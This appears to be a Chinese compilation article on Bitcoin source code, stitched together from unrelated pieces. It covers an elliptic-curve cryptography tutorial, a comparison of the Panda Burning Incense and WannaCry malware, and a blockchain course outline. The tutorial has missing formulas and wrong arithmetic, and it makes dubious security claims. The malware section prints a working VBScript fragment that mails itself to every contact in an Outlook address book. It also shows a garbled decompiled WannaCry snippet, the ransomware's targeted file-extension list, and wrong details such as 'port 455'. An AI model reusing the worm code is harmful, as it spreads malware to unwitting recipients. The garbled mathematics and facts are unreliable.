比特币源码解析比特币源码解读
大家好,关于比特币源码解析很多朋友都还不太明白,今天小编就来为大家分享关于比特币源码解读的知识,希望对各位有所帮助!
本文目录
比特币源码研读一:椭圆曲线在比特币密码中的加密原理比特币源代码如何修改可以变成一个新的虚拟币电脑病毒比拼,比特币和熊猫烧香有哪些相似与不同区块链的模型架构是什么比特币源码研读一:椭圆曲线在比特币密码中的加密原理参加比特币源码研读班后首次写作,看到前辈black写的有关密钥,地址写的很好了,就选了他没有写的椭圆曲线,斗胆写这一篇。
在密码学上有两种加密方式,分别是对称密钥加密和非对称密钥加密。
对称加密:加密和解密使用的同样的密钥。
非对称加密:加密和解密是使用的不同的密钥。
二战中图灵破解德军的恩尼格码应该就是用的对称加密,因为他的加密和解密是同一个密钥。比特币的加密是非对称加密,而且用的是破解难度较大的椭圆曲线加密,简称ECC。
非对称加密的通用原理就是用一个难以解决的数学难题做到加密效果,比如RSA加密算法。RSA加密算法是用求解一个极大整数的因数的难题做到加密效果的。就是说两个极大数相乘,得到乘积很容易,但是反过来算数一个极大整数是由哪两个数乘积算出来的就非常困难。
下面简要介绍一下椭圆曲线加密算法ECC。
首先椭圆曲线的通式是这个样子的:
一般简化为这个样子:
()发公式必须吐槽一下,太麻烦了。)
其中
这样做就排除了带有奇点的椭圆曲线,可以理解为所有的点都有一条切线。
图像有几种,下面列举几个:[1]
椭圆曲线其实跟椭圆关系不大,也不像圆锥曲线那样,是有圆锥的物理模型为基础的。在计算椭圆曲线的周长时,需要用到椭圆积分,而椭圆曲线的简化通式:
,周长公式在变换后有一项是这样的:,平方之后两者基本一样。
我们大体了解了椭圆曲线,就会有一个疑问,这个东西怎么加密的呢?也就是说椭圆曲线是基于怎样的数学难题呢?在此之前还得了解一些最少必要知识:椭圆曲线加法,离散型椭圆曲线。
椭圆曲线加法
数学家门从普通的代数运算中,抽象出了加群(也叫阿贝尔群或交换群),使得在加群中,实数的算法和椭圆曲线的算法得到统一。
数学中的“群”是一个由我们定义了一种二元运算的集合,二元运算我们称之为“加法”,并用符号“+”来表示。为了让一个集合G成为群,必须定义加法运算并使之具有以下四个特性:
1.封闭性:如果a和b是集合G中的元素,那么(a+b)也是集合G中的元素。
2.结合律:(a+b)+c=a+(b+c);
3.存在单位元0,使得a+0=0+a=a;
4.每个元素都有逆元,即:对于任意a,存在b,使得a+b=0.
如果我们增加第5个条件:
5.交换律:a+b=b+a
那么,称这个群为阿贝尔群。[1]
运算法则:任意取椭圆曲线上两点P、Q(若P、Q两点重合,则做P点的切线)做直线交于椭圆曲线的另一点R’,过R’做y轴的平行线交于R。我们规定P+Q=R。(如图)[2]
特别的,当P和Q重合时,P+Q=P+P=2P,对于共线的三点,P,Q,R’有P+Q+R’=0∞.
这里的0∞不是实数意义的0,而是指的无穷远点(这里的无穷远点就不细说了,你可以理解为这个点非常遥远,遥远到两条平行线都在这一点相交了。具体介绍可以看参考文献[2])。
注意这里的R与R’之间的区别,P+Q=R,R并没有与P,Q共线,是R’与P,Q共线,不要搞错了。
法则详解:
这里的+不是实数中普通的加法,而是从普通加法中抽象出来的加法,他具备普通加法的一些性质,但具体的运算法则显然与普通加法不同。
根据这个法则,可以知道椭圆曲线无穷远点O∞与椭圆曲线上一点P的连线交于P’,过P’作y轴的平行线交于P,所以有无穷远点O∞+P=P。这样,无穷远点O∞的作用与普通加法中零的作用相当(0+2=2),我们把无穷远点O∞称为零元。同时我们把P’称为P的负元(简称,负P;记作,-P)。(参见下图)
离散型椭圆曲线
上面给出的很好看的椭圆曲线是在实数域上的连续曲线,这个是不能用来加密的,原因我没有细究,但一定是连续曲线上的运算太简单。真正用于加密的椭圆曲线是离散型的。要想有一个离散型的椭圆曲线,先得有一个有限域。
域:在抽象代数中,域(Field)之一种可进行加、减、乘、除运算的代数结构。它是从普通实数的运算中抽像出来的。这一点与阿贝尔群很类似。只不过多了乘法,和与乘法相关的分配率。
域有如下性质[3]:
1.在加法和乘法上封闭,即域里的两个数相加或相乘的结果也在这个域中。
2.加法和乘法符合结合律,交换率,分配率。
3.存在加法单位,也可以叫做零元。即存在元素0,对于有限域内所有的元素a,有a+0=a。
4.存在乘法单位,也可以叫做单位元。即存在元素1,对于有限域内所有的元素a,有1*a=a。
5.存在加法逆元,即对于有限域中所有的元素a,都存在a+(-a)=0.
6.存在乘法逆元,即对于有限域中所有的元素a,都存在a*=0.
在掌握了这些知识后,我们将椭圆曲线离散化。我们给出一个有限域Fp,这个域只有有限个元素。Fp中只有p(p为素数)个元素0,1,2……p-2,p-1;
Fp的加法(a+b)法则是a+b≡c(modp);它的意思是同余,即(a+b)÷p的余数与c÷p的余数相同。
Fp的乘法(a×b)法则是a×b≡c(modp);
Fp的除法(a÷b)法则是a/b≡c(modp);即a×b∧-1≡c(modp);(也是一个0到p-1之间的整数,但满足b×b∧-1≡1(modp);
Fp的单位元是1,零元是0(这里的0就不是无穷远点了,而是真正的实数0)。
下面我们就试着把
这条曲线定义在Fp上:
选择两个满足下列条件的小于p(p为素数)的非负整数a、b,且a,b满足
则满足下列方程的所有点(x,y),再加上无穷远点O∞,构成一条椭圆曲线。
其中x,y属于0到p-1间的整数,并将这条椭圆曲线记为Ep(a,b)。
图是我手画的,大家凑合看哈。不得不说,p取7时,别看只有10个点,但计算量还是很大的。
Fp上的椭圆曲线同样有加法,法则如下:
1.无穷远点O∞是零元,有O∞+O∞=O∞,O∞+P=P
2.P(x,y)的负元是(x,-y),有P+(-P)=O∞
3.P(x1,y1),Q(x2,y2)的和R(x3,y3)有如下关系:
x3≡-x1-x2(modp)
y3≡k(x1-x3)-y1(modp)
其中若P=Q则k=(3+a)/2y1若P≠Q,则k=(y2-y1)/(x2-x1)
通过这些法则,就可以进行离散型椭圆曲线的计算。
例:根据我画的图,(1,1)中的点P(2,4),求2P。
解:把点带入公式k=(3*x∧2+a)/2y1
有(3*2∧2+1)/2*4=6(mod7).
(注意,有些小伙伴可能算出13/8,这是不对的,这里是模数算数,就像钟表一样,过了12点又回到1点,所以在模为7的世界里,13=6,8=1).
x=6*6-2-2=4(mod7)
y=6*(2-4)-4=2(mod7)
所以2P的坐标为(2,4)
那椭圆曲线上有什么难题呢?在模数足够大的情况下,上面这个计算过程的逆运算就足够难。
给出如下等式:
K=kG(其中K,G为Ep(a,b)上的点,k为小于n(n是点G的阶)的整数)不难发现,给定k和G,根据加法法则,计算K很容易;但给定K和G,求k就相对困难了。
这就是椭圆曲线加密算法采用的难题。我们把点G称为基点(basepoint),k称为私钥,K称为公钥。
现在我们描述一个利用椭圆曲线进行加密通信的过程[2]:
1、用户A选定一条椭圆曲线Ep(a,b),并取椭圆曲线上一点,作为基点G。
2、用户A选择一个私钥k,并生成公钥K=kG。
3、用户A将Ep(a,b)和点K,G传给用户B。
4、用户B接到信息后,将待传输的明文编码到Ep(a,b)上一点M(编码方法很多,这里不作讨论),并产生一个随机整数r(r<n)。
5、用户B计算点C1=M+rK;C2=rG。
6、用户B将C1、C2传给用户A。
7、用户A接到信息后,计算C1-kC2,结果就是点M。因为
C1-kC2=M+rK-k(rG)=M+rK-r(kG)=M
再对点M进行解码就可以得到明文。
整个过程如下图所示:
密码学中,描述一条Fp上的椭圆曲线,常用到六个参量:
T=(p,a,b,G,n,h),p、a、b用来确定一条椭圆曲线,G为基点,n为点G的阶,h是椭圆曲线上所有点的个数m与n相除的整数部分
这几个参量取值的选择,直接影响了加密的安全性。参量值一般要求满足以下几个条件:
1、p当然越大越安全,但越大,计算速度会变慢,200位左右可以满足一般安全要求;
2、p≠n×h;
3、pt≠1(modn),1≤t<20;
4、4a3+27b2≠0(modp);
5、n为素数;
6、h≤4。
200位位的一个数字,那得多大?而且还是素数,所以这种方式是非常安全的。而且再一次交易中,区块被记录下来只有10分钟的时间,也就是说要想解决这个难题必须在10分钟以内。即便有技术能够在10分钟以内破解了现在这个难度的加密算法,比特币社区还可以予以反制,提高破解难度。所以比特币交易很安全,除非自己丢掉密钥,否则不存在被破解可能。
第一次写一个完全陌生的数学领域的知识,也许我有错误的地方,也许有没讲明白的地方,留言讨论吧。总之写完后对比特比系统的安全性表示很放心。
参考文献
[1]椭圆曲线密码学简介
[2]什么是椭圆曲线加密(ECC)
[3]域(数学)维基百科
区块链研习社源码研读班高若翔
比特币源代码如何修改可以变成一个新的虚拟币不好意思
这个你修改不了
因为这个源代码记录了比特币的一路发展过程以及开采过程中遇到的问题以及开采难易程度
有开源代码才能挖矿所以没有一个人能更改的了
电脑病毒比拼,比特币和熊猫烧香有哪些相似与不同近年来的病毒,这里特指蠕虫病毒。
Stuxnet蠕虫,MS10-061,当蠕虫值入机器后,把自己设置成开机自启动,并释放驱动文件,把该驱动设置为服务自启动。该驱动负责突破系统TCP半开连接数限制,以方便蠕虫通过网络传播。感染系统的可移动驱动器(即U盘等),可通过U盘传播自身。通过MS10-061打印机服务远程代码执行漏洞在局域网传播自身。并尝试利用一些弱口令企图猜解并取得主机权限,危及整个网络的安全。为计算机设置了一个后门,不断尝试连接远程黑客服务器,收集用户信息,接收黑客指令,并可获取黑客远程服务器木马并执行,带来严重安全隐患。
熊猫烧香对我来说有点久远,虽然我有初始的蠕虫病毒,但没有解析关键的代码,只从网络中找到说是变了50次的变种一部分。
SetobjOA=Wscript.CreateObject("Outlook.Application")
创建一个OUTLOOK应用的对象
SetobjMapi=objOA.GetNameSpace("MAPI")
取得MAPI名字空间Fori=1toobjMapi.AddressLists.Count遍历地址簿
SetobjAddList=objMapi.AddressLists(i)Forj=1ToobjAddList.AddressEntries.Count
SetobjMail=objOA.CreateItem(0)objMail.Recipients.Add(objAddList.AddressEntries(j)
取得收件人邮件地址
objMail.Subject="你好!"
设置邮件主题
objMail.Body="这次给你的附件,是我的新文档!"
设置信件内容
objMail.Attachments.Add(“c:virus.vbs")
把自己作为附件扩散出去
objMail.Send
发送邮件
Next
Next
SetobjMapi=Nothing
SetobjOA=Nothing
这块是源码的传播方式,其实是劫持了邮箱的账号密码,自动发送邮件给好友,其实附件带的就是病毒复制体了。与最近的比特币病毒相关的也只有在局域网中通过455端口迅速感染。
它的感染方式主要是通过下载,病毒会删除ghost文件,并对文档的图片进行更换,不会对文件造成损坏。
而比特币病毒不同。
WannaCry木马利用泄漏的方程式工具包中的“永恒之蓝”漏洞工具从MS17_010漏洞进行网络端口(455端口)扫描攻击,目标机器被成功攻陷后会从攻击机下载WannaCry木马进行感染,并作为攻击机再次扫描互联网和局域网其他机器,行成蠕虫感染大范围超快速扩散。
木马母体为mssecsvc.exe,运行后会扫描随机ip的互联网机器,尝试感染,也会扫描局域网相同网段的机器进行感染传播,此外会释放敲诈者程序tasksche.exe,对磁盘文件进行加密勒索。
V1=0;
Do
{
P_payload=&payload_x86;
If(v1)
P_payload=&payload_x64;
V3=*(void**)&FileName[4*v1=260];
(&v11+v1)=(int)v3;
memcpy(v3,p_payload,v1!=0?51364:16480);
*(&v11+v1)+=v1!=0?513634:16480;
++v1
}
While(v1<2);
V4+CreateFileA(FileName,0*8000000u,1u,03u,4u,0);
这个就是利用MS17_010的数据了,这个锅只能背给不更新补丁的人了。
木马加密使用AES加密文件,并使用非对称加密算法RSA2048加密随机密钥,每个文件使用一个随机密钥,下面就是密码学的概率了,就和当初二战时期德军的恩尼格玛密码机一样,每一天的密码算法是天文数字,除非得到密钥,其余不可能破解。
熊猫烧香是不会损害文件的,但这个是可以的。
.doc,.docx,.xls,.xlsx,.ppt,.pptx,.pst,.ost,.msg,.eml,.vsd,.vsdx,.txt,.csv,.rtf,.123,.wks,.wk1,.pdf,.dwg,.onetoc2,.snt,.jpeg,.jpg,.docb,.docm,.dot,.dotm,.dotx,.xlsm,.xlsb,.xlw,.xlt,.xlm,.xlc,.xltx,.xltm,.pptm,.pot,.pps,.ppsm,.ppsx,.ppam,.potx,.potm,.edb,.hwp,.602,.sxi,.sti,.sldx,.sldm,.sldm,.vdi,.vmdk,.vmx,.gpg,.aes,.ARC,.PAQ,.bz2,.tbk,.bak,.tar,.tgz,.gz,.7z,.rar,.zip,.backup,.iso,.vcd,.bmp,.png,.gif,.raw,.cgm,.tif,.tiff,.nef,.psd,.ai,.svg,.djvu,.m4u,.m3u,.mid,.wma,.flv,.3g2,.mkv,.3gp,.mp4,.mov,.avi,.asf,.mpeg,.vob,.mpg,.wmv,.fla,.swf,.wav,.mp3,.sh,.class,.jar,.java,.rb,.asp,.php,.jsp,.brd,.sch,.dch,.dip,.pl,.vb,.vbs,.ps1,.bat,.cmd,.js,.asm,.h,.pas,.cpp,.c,.cs,.suo,.sln,.ldf,.mdf,.ibd,.myi,.myd,.frm,.odb,.dbf,.db,.mdb,.accdb,.sql,.sqlitedb,.sqlite3,.asc,.lay6,.lay,.mml,.sxm,.otg,.odg,.uop,.std,.sxd,.otp,.odp,.wb2,.slk,.dif,.stc,.sxc,.ots,.ods,.3dm,.max,.3ds,.uot,.stw,.sxw,.ott,.odt,.pem,.p12,.csr,.crt,.key,.pfx,.der
这些都是病毒会攻击的文档后缀。
和熊猫不同的是,它会通过tor匿名,监听9050端口,通过本地代理通信实现与服务器连接。
区块链的模型架构是什么目前市场上区块链培训课程跨度很大,课程内容和授课形式也是五花八门。
区块链
1、编程基础入门
计算机软硬件基础、字符集及字符编码、HTMLCSS(含HTML5CSS3)、ECMABOMDOM、jQuery、node.js、Ajax及Express
2、Go编程语言
Go基本语法、流程控制、函数及数据、错误处理、Go面向对象编程、Go并发编程、Go网络编程、Go安全编程、Go进阶编程(goroutine、channel)、数据库MySQL、LevelDB
3、区块链1.0——比特币Bitcoin
比特币原理、比特币系统架构、密码算法(Go语言实现)、共识算法(Go语言实现)、比特币交易原理及交易脚本、比特币RPC编程(node.js实现)、比特币源码解析
4、区块链2.0——以太坊Ethereum
以太坊工作原理及基础架构、以太坊基本概念(账户、交易、Gas)、以太坊钱包Mist及Metamask、以太坊交易、ERC20标准Token开发部署、以太坊开发IDE——remix-ide、智能合约与Solidity、Solidity部署、备份及调用、框架技术:truffle及web3、DApp开发实战、Geth
5、区块链3.0——超级账本之Fabric
超级账本项目介绍、Fabric部署和使用、Fabric配置管理、Fabric架构设计、FabricCA应用与配置、应用开发实战。
关于本次比特币源码解析和比特币源码解读的问题分享到这里就结束了,如果解决了您的问题,我们非常高兴。